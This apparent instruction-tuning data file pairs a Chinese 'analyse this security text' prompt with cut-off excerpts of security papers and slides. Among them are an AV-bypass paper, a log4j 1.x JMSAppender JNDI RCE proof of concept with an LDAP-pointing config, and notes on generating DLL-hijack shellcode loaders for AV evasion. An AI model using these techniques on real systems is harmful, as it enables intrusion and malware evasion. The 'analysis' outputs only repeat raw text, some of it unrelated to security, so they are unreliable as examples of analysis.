{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Bypass Antivirus Dynamic Analysis Limitations of the AV model and how to exploit them Date of writing: 08/2014 Author: Emeric Nasi  emeric.nasi[at]sevagas.com Website: http://www.sevagas.com/ License: This work is licensed under a Creative Commons Attribution 4.0 International License Note: This paper requires some knowledge C and Windows system programming 2 1. Introduction  Antivirus are easy to bypass ,  Antivirus are mandatory in defense in depth , This Cryptor is FUD are some of the sentence you hear when doing some researches on antivirus security. I asked myself, hey is it really that simple to bypass AV? After some research I came (like others) to the conclusion that bypassing Antivirus consists in two big steps:  Hide the code which may be recognized as malicious. This is generally done using encryption.  Code the decryption stub in such a way it is not detected as a virus nor bypassed by emulation/sandboxing. In this paper I will mainly focus on the last one, how to fool antivirus emulation/sandboxing systems. Ive set myself a challenge to find half a dozen of ways to make a fully undetectable decryption stub (in fact I found way more than that). Here is a collection of methods. Some of those are very complex (and most FUD cryptor sellers use one of these). Others are so simple I dont understand why Ive never seen these before. I am pretty sure underground and official virus writers are fully aware about these methods so I wanted to share these with the public. 2. Table of Contents 1.Introduction ......................................................................................................................................... 2 2.Table of Contents ................................................................................................................................. 2 3.Bypassing Antivirus theory ................................................................................................................... 3 3.1.Static signature analys", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 第一章 引论 编译器Compiler是一种将高级程序设计语言如 CC++Java等编写的源代码转换为目标代码如汇编语言或机器码的程序编译器通过一系列的处理步骤将源代码翻译成机器可以执行的指令集使程序可以被计算机直接执行 编译器通常包括以下几个主要的处理步骤 1. 词法分析Lexical Analysis将源代码转换为一个个标记Token如关键字标识符数字运算符等 2. 语法分析Syntax Analysis根据语言规范分析源代码中的语法结构构建出抽象语法树Abstract Syntax Tree, AST以方便后续的分析和转换 3. 语义分析Semantic Analysis分析源代码的语义检查类型匹配变量作用域函数调用等语义问题 4. 代码优化Code Optimization对生成的目标代码进行优化以提高程序性能 5. 代码生成Code Generation将优化后的中间代码翻译成目标代码如汇编语言或机器码 编译器在程序开发过程中发挥着重要的作用可以将高级程序设计语言翻译成底层的指令集以实现计算机程序的执行同时编译器还能够进行错误检查优化和调试等功能提高程序开发的效率和程序性能 ## 语言处理器 语言处理器Language Processor是一种将一种语言转换为另一种语言或执行程序的软件系统它包括编译器解释器汇编器链接器等 编译器Compiler是一种将高级程序设计语言如 CC++Java等编写的源代码转换为目标代码如汇编语言或机器码的程序编译器通过一系列的处理步骤将源代码翻译成机器可以执行的指令集使程序可以被计算机直接执行 解释器Interpreter是一种直接执行源代码的程序不需要将源代码转换为目标代码解释器逐行解释源代码并将其转换为计算机可以理解的指令集然后直接执行这些指令 汇编器Assembler是一种将汇编语言代码转换为机器码的程序汇编器将汇编语言代码转换为二进制代码以便计算机可以直接执行 链接器Linker是一种将多个目标文件链接成一个可执行文件的程序链接器将多个目标文件中的符号表进行合并并将它们链接到正确的内存地址上以便程序可以正确执行 语言处理器在计算机程序开发中扮演着重要的角色它可以将高级程序设计语言翻译成底层的指令集以实现计算机程序的执行同时语言处理器还能够进行错误检查优化和调试等功能提高程序开发的效率和程序性能 ------ JAVA是一种先编译后解释的语言下面是JAVA编译和解释的过程 1. 编写JAVA源代码程序员使用文本编辑器等工具编写JAVA源代码源代码文件的扩展名为.java 2. 编译JAVA源代码使用Javac编译器将JAVA源代码编译成字节码文件字节码文件的扩展名为.class编译器将源代码中的每个类编译成一个独立的字节码文件每个字节码文件包含了该类的方法变量和常量等信息 3. 加载字节码文件Java虚拟机JVM将字节码文件加载到内存中并对其进行解析 4. 字节码校验JVM对字节码文件进行校验检查它是否符合Java语言规范如果字节码文件存在问题JVM会拒绝执行该文件 5. 字节码优化JVM对字节码文件进行优化以提高程序的性能JVM会进行常量折叠代码移除方法内联等优化操作 6. 解释字节码JVM解释字节码文件中的指令将其转换为机器码并执行JVM还会进行内存管理线程管理异常处理等操作 因此JAVA编译和解释的过程可以分为两个阶段编译阶段和运行阶段在编译阶段Javac编译器将JAVA源代码编译成字节码文件在运行阶段JVM将字节码文件加载到内存中并解释执行 ------ 预处理器Preprocessor是一种对源代码进行预处理的程序主要用于进行宏替换条件编译等操作以便将源代码转换为适合编译器处理的形式预处理器通常被用于CC++Objective-C等语言中 预处理器可以进行以下一些操作 1. 宏替换Macro Expansion预处理器可以将源代码中的宏Macro展开为对应的代码以便编译器能够正确处理 2. 条件编译Conditional Compilation预处理器可以根据条件编译指令选择性地编译或忽略源代码中的部分内容这在编写可移植代码或处理不同操作系统的API时很有用 3. 文件包含File Inclusion预处理器可以通过#include指令将一个文件中的内容包含到另一个文件中以便代码复用和模块化编程 4. 特殊指令Special Directives预处理器还可以通过特殊指令向编译器传递额外的信息如指定链接库定义编译器变量等 预处理器的输出通常是一份新的源代码文件其中宏已经被展开条件编译已经完成文件已经包含编译器将这个新的源代码文件作为输入对其进行编译和链接等操作最终生成可执行文件 总之预处理器是编程中的一个重要工具可以使程序更加灵活可维护和可重用它可以减少代码冗余提高程序", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Evil Website (forensics) We're given a directory containing lots of interesting firefox stuff. ``` [michal@Bobik] [/dev/ttys002] [master ] [~/Downloads/Chall]> ls AlternateServices.txt containers.json firebug modifyheaders.conf serviceworker.txt SecurityPreloadState.txt content-prefs.sqlite formhistory.sqlite notificationstore.json sessionCheckpoints.json SiteSecurityServiceState.txt cookies.sqlite gmp permissions.sqlite sessionstore-backups addonStartup.json.lz4 cookies.sqlite-shm gmp-gmpopenh264 pkcs11.txt shield-preference-experiments.json addons.json cookies.sqlite-wal gmp-widevinecdm places.sqlite storage blocklist.xml crashes handlers.json places.sqlite-shm storage.sqlite blocklists datareporting key3.db places.sqlite-wal times.json bookmarkbackups extensions key4.db pluginreg.dat weave browser-extension-data extensions.json kinto.sqlite prefs.js webapps cert8.db favicons.sqlite lock revocations.txt webappsstore.sqlite cert9.db favicons.sqlite-shm logins.json saved-telemetry-pings webappsstore.sqlite-shm cert_override.txt favicons.sqlite-wal mimeTypes.rdf search.json.mozlz4 webappsstore.sqlite-wal compatibility.ini features minidumps secmod.db xulstore.json ``` Unfortunately, all we had to do is notice a pretty suspicious cookie: ![cookie](cookie.png) Decoding the base64 gave us a weird `Targa image data` file. You might be tempted to look for some weird ancient software just to view it, but as it turned out that the best way was to actually just import it into gimp as raw data: ![solution](solution.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n消失的那几年 杨 蔚 301 白帽子的成长独白 2016.07.14 众安天下 关于我 01 90后连续创业者黑客理想主义者 02 乌云核心白帽子大学肄业 03 原乌云合伙人乌云众测平台负责人 04 北京众安天下科技有限公司创始人兼 CEO安全自媒体平台出品人301 在路上 WeChat2036234 Email301@allsec.cn 杨 蔚 花名301 众安天下 CONTENT 消失的那几年哪去了 这几年做到的事情 快速成长的秘笈 安全总结与建议 众安天下 1消失的那几年哪去了 众安天下 消失的那几年哪去了 WHY? 高考失利人生太顺无法接受 WHAT? 网络工作室把自己关在网络世界 里但因经营不善工作室关闭 HOW? 选择继续消失逃避不愿他人 看到自己的失意和落魄退学 WHERE? 与亲朋好友断绝了联系失联很 久在新的地方重新开始创业 一心想挤进\"安全圈\" 消失的那几年的愿景 众安天下 大部分人的成长轨迹\" 消失的那几年哪去了 众安天下 利用大量精力弥补 消失的那几年哪去了 301一直在路上 众安天下 消失的那几年哪去了 \" 301什么时候来北京出差\" 身边所有的声音 众安天下 2这几年做到的事情 众安天下 高级安全顾问2012.72014.2  在国内知名安全咨询公司谷安天下做渗透测试方向 安全顾问\"野蛮生长\" 乌云合伙人乌云众测负责人20142016.4  负责乌云企业商业运营及技术服务创新业务服务 企业和白帽子并完成很多不可能的事情 众安天下创始人兼CEO2016年创业在路上  安全人才服务安全内容服务提供一站式的企业安 全顾问服务等 这几年做到的事情 众安天下 这几年遇到的事情 \"白帽子不信任不理解\" 身边大部分的声音 众安天下 \"你之所以看不到黑暗\" \"是因为有人竭尽全力把黑暗挡在你看不到的地方\" 这几年遇到的事情 暴走大事件主编王尼玛 众安天下 3快速成长的秘笈 众安天下 第一健康心态 快速成长的秘笈 众安天下 第二换位思考 快速成长的秘笈 众安天下 第三自我驱动 快速成长的秘笈 众安天下 第四提升效率 快速成长的秘笈 众安天下 第五自信不自负 快速成长的秘笈 众安天下 第六合理试错 快速成长的秘笈 众安天下 第七专业技能 快速成长的秘笈 众安天下 第八行业知识 快速成长的秘笈 众安天下 4安全总结和建议 众安天下 \"原地踏步就是退步\" 安全的建议和总结 众安天下 \"最大的对手是自己\" 安全的建议和总结 众安天下 \"真正懂你的人不是自己\" \"而是竞争对手\" 安全的建议和总结 众安天下 \"执行力是成功的第一生产力\" 安全的建议和总结 众安天下 多数失败死在\"快\"的路上 安全的建议和总结 众安天下 \"大部分人什么是竞争力 \" 安全的建议和总结 众安天下 \"把简单的事情做到极致\" \"就是核心竞争力\" 安全的建议和总结 众安天下 \"意欲取之必先予之\" 安全的建议和总结 众安天下 \"安全是一种能力\" \"技术转化为生产力\" 安全的建议和总结 众安天下 在对的时间里 跟对的人 一起做对的事情 安全的建议和总结 众安天下 认可包容机会 \" 安全的建议和总结 安全新人们的心音 众安天下 THANK YOU 聚天下英才而用之 以人为本众安天下 www.allsec.cn 众安天下 301在路上 301@allsec.cn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2013 NCC Group An NCC Group Publication Revealing Embedded Fingerprints: Deriving Intelligence from USB Stack Interactions Prepared by: Andy Davis Research Director andy.davis at nccgroup.com NCC Group | Page 2  Copyright 2013 NCC Group Contents 1 List of Figures and Tables .......................................................................................................... 3 2 Introduction .................................................................................................................................. 4 2.1 Previous Research ................................................................................................................ 4 3 USB Background: The Enumeration Phase in Detail ............................................................... 4 4 USB Testing Platform .................................................................................................................. 8 5 USB Stack Implementations ....................................................................................................... 9 6 Identifying Supported Devices ................................................................................................. 10 6.1 USB Device Classes ........................................................................................................... 10 6.2 Enumerating Installed Class Drivers ................................................................................... 12 6.3 Other Devices Already Connected...................................................................................... 13 7 Fingerprinting Techniques ....................................................................................................... 14 7.1 Operating System Identification .......................................................................................... 14 7.2 Application Identification ..................................................................................................... 14 7.3 Timing ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Back to the basics, re, 293p >You won't find any assembly in this challenge, only C64 BASIC. Once you get the password, the flag is CTF{password}. P.S. The challenge has been tested on the VICE emulator. Running the attached file on the emulator greets us with password prompt, so we probably have to guess it. The binary was \"compiled\" BASIC code, and running it through a few disassemblers showed only a couple of lines of source; much less than what we would expect from 32kB binary. There are a few strange `POKE`s there, and when we checked what addresses they write to, it turned out to be program memory - so we have a self-modifying code there! Not willing to run it with debugger, I wrote a simple dumb disassembler, not stopping on any errors - `replace.py`. We then found some extra lines: ``` 2001 POKE 03397, 00069 : POKE 03398, 00013 2002 POKE 1024 + CHKOFF + 1, 81:POKE 55296 + CHKOFF + 1, 7 2004 ES = 03741 : EE = 04981 : EK = 148 2005 FOR I = ES TO EE : K = ( PEEK (I) + EK ) AND 255 : POKE I, K : NEXT I 2009 POKE 1024 + CHKOFF + 1, 87 ``` These lines seem to be decoding some data, which happened to be garbage bytes placed right afterwards. We wrote a script running the same algorithm (in a few places, since there were multiple blocks of code like that) - `decode.py`. Disassembling the new code too, we found most of it readable. The encrypted chunks were of following form: ``` 2010 V = 0.6666666666612316235641 - 0.00000000023283064365386962890625 : G = 0 2020 BA = ASC ( MID$ (P$, 1, 1) ) 2021 BB = ASC ( MID$ (P$, 2, 1) ) 2025 P0 = 0:P1 = 0:P2 = 0:P3 = 0:P4 = 0:P5 = 0:P6 = 0:P7 = 0:P8 = 0:P9 = 0:PA = 0:PB = 0:PC = 0 2030 IF BA AND 1 THEN P0 = 0.062500000001818989403545856475830078125 2031 IF BA AND 2 THEN P1 = 0.0156250000004547473508864641189575195312 2032 IF BA AND 4 THEN P2 = 0.0039062500001136868377216160297393798828 2033 IF BA AND 8 THEN P3 = 0.0009765625000284217094304040074348449707 2034 IF BA AND 16 THEN P4 = 0.0002441406250071054273576010018587112427 203", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对 log4j2 漏洞的后续研究中发现些有趣的东记录分享下 先提出个问题log4j 真的在任何情况不存在 JNDI注吗 答案是否定的 翻阅 Log4j2 的 pull request 发现个有意思的对话 有提出实际上 log4j 和 log4j2 样易受攻击的只不过与 log4j2 相Log4j 的攻击向量更安全 因为 Log4j 的攻击点是其配置件 log4j2 的攻击点是户的输 那么实际上如何呢经过我简单测试发现修改 log4j 的配置件确实会导致漏洞的产但要求要pull reques中所说的更苛刻 先在 maven 中添加以下依赖 001 写在前 002 log4j 真的在任何情况不存在 JNDI注吗 案例1  log4j 配置件中 JMSAppender 的 RCE <dependencies> <dependency> <groupId>log4j</groupId> <artifactId>log4j</artifactId> <version>1.2.17</version> </dependency> <dependency> <groupId>org.apache.activemq</groupId> 然后在resource 录下新建 log4j.properties 件内容如下 最后新建 Log4jJMSAppenderTest.java 件内容如下 可以看到项的所到的主要依赖是 log4j 1.2.17 版本然后为了满条件要求后会说具体什么条件 引了最新版的 activemq 依赖 然后如果直接运 main 函数可以直接触发 RCE <artifactId>activemq-broker</artifactId> <version>5.16.3</version> </dependency> </dependencies> log4j.rootLogger=INFO, stdout, jms log4j.logger.org.apache.activemq=INFO, stdout log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.layout=org.apache.log4j.PatternLayout log4j.appender.stdout.layout.ConversionPattern=%d %-5p %c - %m%n log4j.appender.jms=org.apache.log4j.net.JMSAppender log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitia lContextFactory log4j.appender.jms.ProviderURL=tcp://localhost:61616 log4j.appender.jms.TopicBindingName=jmsTest log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://127.0.0.1:1389/erqtcd import Logger; import NamingException; class Log4jJMSAppenderTest { public static void main(String[] args) throws NamingException { // 通常情况下会动加载 Log4j 的配置件如果不能动加载可以取消注释下代码 // PropertyConfigurator.configure( \"/Users/panda/Downloads/log4jDemo/src/main/resources/log4j.properties\" ); Logger logger = Logger.getLogger(Log4jJMSAppenderTest.class); logger.error(\"error\"); } } JAVA org.apache.log4j. javax.naming. 原理很简单log4j 有个名为Appenders的功能Appender 通常只负责将事件数据写标指定的区域  如数据库JMS 代理等 当检测到 log4j.properties 配置件中存在指定的 Appender 时会动进相应的功能逻辑 如假设配置了 log4j.appender.file=org.apache.log4j.FileAppender 那么会进 FileAppender.java 中的 activateOpt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity is a Neverending Story CEO Luta Security Inc @lutasecurity @k8em0 Katie Moussouris Were Going to Need More than Luck Who the FSCK Are You? What is it you do here?  Founder & CEO Luta Security  Former Microsoft Security Strategist  Former Hacker for Hire  ISO Standards Editor  New America Foundation Fellow  MIT Sloan Visiting Scholar  Harvard Belfer Affiliate  Cyber Arms Control Re- Negotiator Every Story Has A Beginning Hacker for Hire  Learning Empathy Dont Let the Rain Get You Down HAS SECURITY BUGS ALL CODE This Guy is Onto Something Thanks https://twitter.com/virturity/status/799242892082429953 @k8em0 @lutasecurity Im a Hacker and Im Here to Help History of Vulnerability Disclosure and Bug Bounty Programs Vulnerability Disclosure vs. Bug Bounty Programs  Vulnerability Disclosure Ensures that organizations are ready to handle vulnerability reports. Follows the ISO standards for vulnerability disclosure (ISO 29147) and vulnerability handling processes (ISO 30111). 94% of the Forbes 2000 companies dont have this in place  Bug Bounty Programs Some organizations and governments choose to offer cash rewards for bugs. Some do it alone (e.g. Microsoft), while the majority choose a bug bounty service provider to help. Bug Bounties can work in large and small organizations, with some prep & help Bug Bounty vs Penetration Testing And Bug Bounty Service Providers Thanks Jason! http://www.slideshare.net/bugcrowd/how-do-i-shot-web-jason-haddix-at-defcon-23 Bug Bounty Service Providers  At a glance BugCrowd HackerOne Synack The Easy Button for Triage Platform for Power Users Secret Squirrels Great if you need triage support, less so if you dont want triage outside your companys eyes only Great if you want automation for your own vulnerability handling, less so if you lack the internal talent to use it Great if you want a crowd-sourced penetration test under NDA, less so if you need a broader pool of eyes From Microsoft to the Pentagon AKA: From No Way! to Ok, for Pay!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n自动化生成器 前面核心的内容跑通了后面自动化生成就是理所当然的这方面没什么困难的就是注意一下加一些 对抗的东西比如生成的源码里面的字符串全部加密用于加解密shellcode的key全部随机化生成将 源码一起打包并告诉编译方式这样即使生成的dll被杀了也没关系自己改改又可以继续了 一些核心功能 收集一些白加黑文件制作成模板 解析白文件pe将shellcode写入证书目录 根据模板来生成劫持dll 自动调用go命令进行编译 自动打包成zip 里面最麻烦的就是自动编译因为服务器是linux而要生成windows的程序并且在go里面使用了 cgo不可避免的要使用交叉编译器了 找了找资料用mingw-w64 https://www.mingw-w64.org/downloads/ 可以编译linux编译器在它下 面有很多linux的二进制直接就能拿来用但是找了半天没发现centos的用yum也没发现包 最后找到了https://bugzilla.redhat.com/show_bug.cgi?id=1807975 官方将它给移除掉了但也没说 替代方案 尝试自己编译源码download: https://sourceforge.net/projects/mingw-w64/ 尝试了下后面就放弃了编译完估计得占用几个G空间让本就不充裕的服务器雪上加霜更重要的是 尝试进行编译的第一步我就失败了github上有一些可以自动编译的脚本但看了下源码它得翻墙下 载一些东西而服务器上翻墙太麻烦 最后把目光锁向了dockergithub有个项目可以很好的满足我的要求 https://github.com/x1unix/dock er-go-mingw 用了一下发现很好用学习成本也很低于是开开心心的就去把自动编译集成到docker上最后测 试发现还是失败 找其原因是这个项目基于的alpine只能支持64位的编译 于是我给官方提了一个issue https://github.com/x1unix/docker-go-mingw/issues/14 官方也很快就回复了我 要编译成32位需要修改 cc 为32位的编译器 很快官方出了一个基于 apline linux/386 的项目我测试后发现在mac下仍然存在问题 于是在星球上发帖说了下被阻挡在了交叉编译上 但是 @李文致 发给我了一个dockerfile完美解决了docker上交叉编译的问题李文致的版本基于 debian在它的基础上直接apt装编译器非常简单有效 根据它的dockerfile我改了下 FROM golang:1.16 RUN echo \"deb https://mirrors.tuna.tsinghua.edu.cn/debian/ buster main contrib non-free\">/etc/apt/sources.list &&\\ echo \"deb https://mirrors.tuna.tsinghua.edu.cn/debian/ buster-updates main contrib non-free\" >>/etc/apt/sources.list &&\\ 已经可以解决我的问题 后续https://github.com/x1unix/docker-go-mingw 也换成了基于debian的golang镜像并且也支持 了x86 x64的交叉编译环境 增强对抗 之前改写入口点死循环使用了下面死循环的汇编代码 但是发现CPU占用会很大 于是想着加个sleep但是这样shellcode里就得调用api函数比较麻烦 于是想了一招在dllmain里面获取sleep的地址写到shellcode的地址上 具体就是先 再用汇编写个模板可以将shellcode直接写进去的 echo \"deb https://mirrors.tuna.tsinghua.edu.cn/debian/ buster-backports main contrib non-free\" >>/etc/apt/sources.list &&\\ echo \"deb https://mirrors.tuna.tsinghua.edu.cn/debian-security/ buster/updates main contrib non-free\" >>/etc/apt/sources.list &&\\ apt update -y && apt install gcc-mingw-w64-i686 gcc-mingw-w64-x86-64 -y && apt autoclean && apt clean RUN mkdir -p /go/work ENV PATH=/go/bin:$PATH \\ CGO_ENABLED=1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTeaching Hacking at College Sam Bowne Computer Networking and Information Technology City College San Francisco New Class at CCSF Hacking is Built into Our Program Why Teach Hacking?  Lectures aren't enough  Students need hands-on labs  Practice attack and defense  Hacking is new and exciting  Even professional network admins don't know hacking Isn't Teaching Hacking Dangerous?  Criminal hackers don't go to college to learn it  The good guys need to learn it too  Discussing the issues openly is better than forcing students to learn it outside class Level of Course  Prerequisites: Network+ and Security+  No programming  We don't create exploits  We just use existing tools, like \"script kiddies\"  Each project shows vulnerability, attack, and defense The Hacking Lab  Host systems:  Windows XP, 1 GB RAM, 2.2 GHz Pentium 4  20 GB System drive, 80 GB drive for VMs  Each student has a folder with three VMware virtual machines  Windows XP  Windows 2000 Pro  Ubuntu Linux Internet Connection  A single ZyXel router connects the lab to the Internet  Upstream bandwidth throttled to 128 kbps  To protect the Net from the lab Warnings  Each student signed a \"Code of Ethics\" agreement  Warnings posted in lab and on screens at boot-up Student Assistants  Student volunteers monitored the lab, and had keys  The lab became a hangout for hackers  None of the equipment was broken or stolen  Morale was high Projects: Attacks  Metasploit  Taking Over a Windows 2000 box from Windows XP  Taking over a locked Windows 2000 box from Linux  Performing a Denial of Service attack on a Web Server with Nmap  Rootkitting Ubuntu Linux (and fixing it)  Basic Website hacking with HackThisSite.org Projects: Finding Vulnerabilities  Port Scanning with Nmap  Analyzing Port Scans with Wireshark  Testing Firewalls  NetBIOS Null Sessions  Nessus Vulnerability Scanner  Microsoft Baseline Security Analyzer (MBSA)  Winfingerprint Projects: Stealing Passwords  Ettercap  Software and Hardware Keyloggers  Ophcrack  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 2007 David Hulton <david@toorcon.org> Chairman, ToorCon Security R&D, Pico Computing, Inc. Researcher, The OpenCiphers Project Faster PwninG Assured: New Adventures with FPGAs DEFCON 2007 2007  The OpenCiphers Project Overview  FPGAs  Quick Intro  New Cracking Tools! (Since ShmooCon)  BTCrack  Bluetooth Authentication  WinZipCrack  WinZip AES Encryption  New to 2007! (Since Last Defcon)  VileFault  Mac OS-X FileVault  jc-aircrack  WEP (FMS)  Works in Progress  Conclusions DEFCON 2007 2007  The OpenCiphers Project FPGAs DEFCON 2007 2007  The OpenCiphers Project FPGAs DEFCON 2007 2007  The OpenCiphers Project FPGAs  Quick Intro  Chip with a ton of general purpose logic  ANDs, ORs, XORs  FlipFlops (Registers)  BlockRAM (Cache)  DSP48s (ALUs)  DCMs (Clock Multipliers) DEFCON 2007 2007  The OpenCiphers Project FPGAs  Virtex-4 LX25 DEFCON 2007 2007  The OpenCiphers Project FPGAs  Virtex-4 LX25  IOBs (448) DEFCON 2007 2007  The OpenCiphers Project FPGAs  Virtex-4 LX25  IOBs  Slices (10,752) DEFCON 2007 2007  The OpenCiphers Project FPGAs  Virtex-4 LX25  IOBs  Slices  DCMs (8) DEFCON 2007 2007  The OpenCiphers Project FPGAs  Virtex-4 LX25  IOBs  Slices  DCMs  BlockRAMs (72) DEFCON 2007 2007  The OpenCiphers Project FPGAs  Virtex-4 LX25  IOBs  Slices  DCMs  BlockRAMs  DSP48s (48) DEFCON 2007 2007  The OpenCiphers Project FPGAs  Virtex-4 LX25  IOBs  Slices  DCMs  BlockRAMs  DSP48s  Programmable Routing Matrix (~18 layers) DEFCON 2007 2007  The OpenCiphers Project Bluetooth PIN Cracking  Pairing bluetooth devices is similar to wifi authentication  Why not crack the bluetooth PIN?  Uses a modified version of SAFER+  SAFER+ inherently runs much faster in hardware  Attack originally explained and published by Yaniv Shaked and Avishai Wool  Thierry Zoller originally demonstrated his implementation at hack.lu DEFCON 2007 2007  The OpenCiphers Project Bluetooth PIN Cracking  How it works  Capture a bluetooth authentication (sorry, requires an expensive protocol analyzer)  Thi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"BUSCTL\" \"1\" \"\" \"systemd 231\" \"busctl\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" busctl \\- 内省与监视 D\\-Bus 总线 .SH \"SYNOPSIS\" .HP \\w'\\fBbusctl\\fR\\ 'u \\fBbusctl\\fR [OPTIONS...] [COMMAND] [\\fINAME\\fR...] .SH \"描述\" .PP \\fBbusctl\\fR 可用于内省与监视 D\\-Bus 总线 .SH \"选项\" .PP 能够识别的命令行选项如下 .PP \\fB\\-\\-address=\\fR\\fB\\fIADDRESS\\fR\\fR .RS 4 连接到 \\fIADDRESS\\fR 指定的总线 而不是默认的总线(无论是 \\fB\\-\\-system\\fR 系统总线还是 \\fB\\-\\-user\\fR 用户总线) .RE .PP \\fB\\-\\-show\\-machine\\fR .RS 4 在使用 \\fBlist\\fR 命令显示总线上的所有 peer 列表时 额外显示一个\"MACHINE\"列指明其所属容器的名称参见 \\fBsystemd-machined.service\\fR(8) 手册 .RE .PP \\fB\\-\\-unique\\fR .RS 4 在使用 \\fBlist\\fR 命令显示总线上的所有 peer 列表时仅显示 \":\\fInumber\\fR\\&.\\fInumber\\fR\" 格式的\"唯一名\"(UniqueName) .RE .PP \\fB\\-\\-acquired\\fR .RS 4 在使用 \\fBlist\\fR 命令显示总线上的所有 peer 列表时与 \\fB\\-\\-unique\\fR 选项正好相反 仅显示\"易读名\"(well\\-known name) .RE .PP \\fB\\-\\-activatable\\fR .RS 4 在使用 \\fBlist\\fR 命令显示总线上的所有 peer 列表时 仅显示当前未被激活并且可以在被访问时自动激活的 peer  .RE .PP \\fB\\-\\-match=\\fR\\fB\\fIMATCH\\fR\\fR .RS 4 在使用 \\fBmonitor\\fR 命令监视已交换的消息时 仅显示与 \\fIMATCH\\fR 匹配的消息 参见 \\fBsd_bus_add_match\\fR(3) .RE .PP \\fB\\-\\-size=\\fR .RS 4 在使用 \\fBcapture\\fR 命令捕获已交换的消息时 指定允许捕获的最大消息尺寸(\"snaplen\") 默认值是 4096 字节 .RE .PP \\fB\\-\\-list\\fR .RS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBefore the FEDERAL COMMUNICATIONS COMMISSION Washington, DC 20554 In the Matter of ) ) Unlicensed Operation in the TV Broadcast ) ET Docket No. 04-186 Bands ) ) ET Docket No. 02-380 Additional Spectrum for Unlicensed Devices ) Below 900 MHz and in the 3 GHz Band ) To: The Commission JOINT COMMENTS OF THE ASSOCIATION FOR MAXIMUM SERVICE TELEVISION, INC. AND THE NATIONAL ASSOCIATION OF BROADCASTERS TABLE OF CONTENTS EXECUTIVE SUMMARY .........................................................................................................iii I. THROUGHOUT THIS PROCEEDING THE COMMISSION MUST UPHOLD ITS COMMITMENT TO THE DIGITAL TELEVISION TRANSITION................ 2 II. CERTAIN MINIMUM PROTECTIONS MUST BE ADOPTED BEFORE ALLOWING TV BAND DEVICES TO OPERATE IN THE BROADCAST SPECTRUM...................................................................................................................... 5 III. THE INTERFERENCE HARMS POSED BY TV BAND DEVICES ARE NOT ADEQUATELY ADDRESSED IN THE FNPRM. ....................................................... 8 A. Any Operation By A TV Band Device On A Co-Channel Basis Will Cause Interference For Miles...................................................................................................... 9 B. The Current Sensing Proposals Are Inadequate To Protect Against Co-Channel Interference. .................................................................................................................... 10 1. The Proposal Of A -116 dBm Sensing Level Is Insufficient To Protect Incumbent Services......................................................................................................................... 11 2. The Comparison Of The Use Of Spectrum Sensing In The 5 GHz Band With The Current Situation Is Misplaced. ................................................................................ 13 C. Any Operation of a TV Band Device On A Television Stations First Adjacent Channel Will Harm Reception. ................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJava安全之Cas反序列化漏洞分析 0x00 前言 某次项目中遇到Cas以前没接触过借此机会学习一波 0x01 Cas 简介 CAS 是 Yale 大学发起的一个开源项目旨在为 Web 应用系统提供一种可靠的单点登录方法CAS 在 2004 年 12 月正式成为 JA-SIG 的一个项目开源的企业级单点登录解决方案 0x02 远程调试环境搭建 下载地址,将环境war包下载部署到tomcat即可 tomcat目录bin文件下 startup_debug.bat call %EXECUTABLE%\" start %CMD_LINE_ARGS% 改为 IDEA中设置Remote远程调试5005即可完成 0x03 漏洞分析 漏洞详情 4.1.7版本之前存在一处默认密钥的问题利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏 洞进而执行任意命令 影响版本 Apereo CAS <= 4.1.7 感觉上和Shiro的 550有点类似 解析流程分析 看web.xml得知该项目基于Spring MVC开发 上图请求路径是 /login 的这里来直接找login的处理方法进行跟踪 set JPDA_TRANSPORT=dt_socket set JPDA_ADDRESS=5005 set JPDA_SUSPEND=n call \"%EXECUTABLE%\" jpda start %CMD_LINE_ARGS% 从web.xml中可见交给了 DispatcherServlet 去处理 这时候可以查看springmvc的配置文件 cas-servlet.xml 注意 loginHandlerAdapter 这个配置的bean其中的属性有 supportedFlowId 的值为\"login\"同时 属性flowExecutor-ref的引用值为 loginFlowExecutor  再看 loginFlowExecutor 